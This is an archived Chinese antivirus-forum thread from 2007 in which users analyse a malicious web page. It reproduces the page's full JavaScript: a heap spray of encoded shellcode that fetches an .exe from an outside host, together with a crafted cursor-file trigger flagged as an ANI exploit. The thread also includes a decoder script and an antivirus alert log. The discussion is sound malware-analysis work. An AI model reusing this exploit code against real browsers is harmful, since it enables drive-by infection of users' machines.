12
返回列表 发新帖
楼主: mofunzone
收起左侧

[病毒样本] kv你够nb就给我把这网页杀了[md5:aab3f]

[复制链接]
icka
发表于 2007-6-17 17:35:19 | 显示全部楼层
原帖由 solcroft 于 2007-6-17 17:16 发表
开玩笑程序,不是病毒
挺好玩的

那个js你解密了吗?

  1. <SCRIPT language="javascript">
  2. var cvzkoAmeM = 0x07000000;
  3. var ZcQqzEMqCqxFiLcBXzeSi = unescape("%u54eb%u758b%u8b3c%u3574%u0378%u56f5%u768b%u0320%u33f5%u49c9%uad41%udb33%u0f36%u14be%u3828%u74f2%uc108%u0dcb%uda03%ueb40%u3bef%u75df%u5ee7%u5e8b%u0324%u66dd%u0c8b%u8b4b%u1c5e%udd03%u048b%u038b%uc3c5%u7275%u6d6c%u6e6f%u642e%u6c6c%u2e00%u5c2e%u2e4c%u7865%u0065%uc033%u0364%u3040%u0c78%u408b%u8b0c%u1c70%u8bad%u0840%u09eb%u408b%u8d34%u7c40%u408b%u953c%u8ebf%u0e4e%ue8ec%uff84%uffff%uec83%u8304%u242c%uff3c%u95d0%ubf50%u1a36%u702f%u6fe8%uffff%u8bff%u2454%u8dfc%uba52%udb33%u5353%ueb52%u5324%ud0ff%ubf5d%ufe98%u0e8a%u53e8%uffff%u83ff%u04ec%u2c83%u6224%ud0ff%u7ebf%ue2d8%ue873%uff40%uffff%uff52%ue8d0%uffd7%uffff%u7468%u7074%u2f3a%u622f%u6f6c%u2e67%u6968%u7073%u7361%u6365%u632e%u6d6f%u6c2f%u6261%u726f%u7461%u726f%u6f69%u722f%u6365%u7275%u6f73%u2f73%u6e61%u2f69%u6568%u7461%u652e%u6578%u0000");
  4. var ruIkOArwUT = 0x400000;
  5. var QBFsMnqdAr = ZcQqzEMqCqxFiLcBXzeSi.length * 4;
  6. var lXvvcFsuXr = ruIkOArwUT - (QBFsMnqdAr+0x38);
  7. var YHPRWlSAts = unescape("%u4141%u4141");
  8. YHPRWlSAts = XeJzfAckyrTT(YHPRWlSAts,lXvvcFsuXr);
  9. PPaWjWZuOCGL = (cvzkoAmeM - 0x100000)/ruIkOArwUT;
  10. memory = new Array();
  11. for (i=0;i<PPaWjWZuOCGL;i++)
  12. {
  13.   memory[i] = YHPRWlSAts + ZcQqzEMqCqxFiLcBXzeSi;
  14. }
  15. document.write("<HTML><BODY style="CURSOR: url('xrWqbcVOWnezXCS.YtVyFreutFltHSd')">    </BODY></HTML>")
  16. function XeJzfAckyrTT(YHPRWlSAts, lXvvcFsuXr)
  17. {
  18.   while (YHPRWlSAts.length*2<lXvvcFsuXr)
  19.   {
  20.    YHPRWlSAts += YHPRWlSAts;
  21.   }
  22.   YHPRWlSAts = YHPRWlSAts.substring(0,lXvvcFsuXr/2);
  23.   return YHPRWlSAts;
  24. }
  25. </SCRIPT>

复制代码

就是这个哦.
那个地址是
%u3574是内存地址?这个不懂了,病毒地址是附录在这段代码的最后那部分解出来的.

看这个代码和雅虎的那个头像似啊,因为手里没有雅虎的那个代码,所以估计..这个猜测这个就是用的那个雅虎的.

这个大体形式和那个QQ o-day漏洞还有XML的那个也是吧.
solcroft
发表于 2007-6-17 18:04:06 | 显示全部楼层

回复 #11 icka 的帖子

我就是解到这里... 然后不懂了
unescape怎么会5字节的?
taihuxian
发表于 2007-6-17 21:00:22 | 显示全部楼层
Virus: Exploit.Win32.IMG-ANI.af

Virus found while downloading Web content.

Address: bbs.kafan.cn

2007-6-17,21:03:34 [WARNING] Contains signature of the joke program JOKE/Schmilz!
  C:\WINDOWS\Temp\_avast4_\unp176499747.tmp
      [INFO] No action will be taken on the file.
icka
发表于 2007-6-17 21:17:10 | 显示全部楼层
原帖由 solcroft 于 2007-6-17 18:04 发表
我就是解到这里... 然后不懂了
unescape怎么会5字节的?

  1. <script language=javascript>
  2. string="%u6800%u7474%u3a70";
  3. ustr=unescape(string);
  4. var code;
  5. var high,low=0;
  6. for(var i=0;i<ustr.length;i++)
  7. {
  8. code=ustr.charCodeAt(i);
  9. low=code%256;
  10. high=(code-low)/256;
  11. document.write(String.fromCharCode(low)+String.fromCharCode(high));
  12. }
  13. </script>
复制代码

自己替换里面的%u....那部分.
本来想贴原来日志的地址的,可过去看好像已经编辑掉了,就留我的那个吧.
http://www.icka.com.cn/blog/read.php?87
应该这个类似.
solcroft
发表于 2007-6-17 21:34:06 | 显示全部楼层

回复 #14 icka 的帖子

谢谢指点
icka
发表于 2007-6-17 22:03:40 | 显示全部楼层
这个是死鱼http://hi.baidu.com/bjshiyu
写的,我只是拿来主义~~
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-7 23:45 , Processed in 0.093140 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表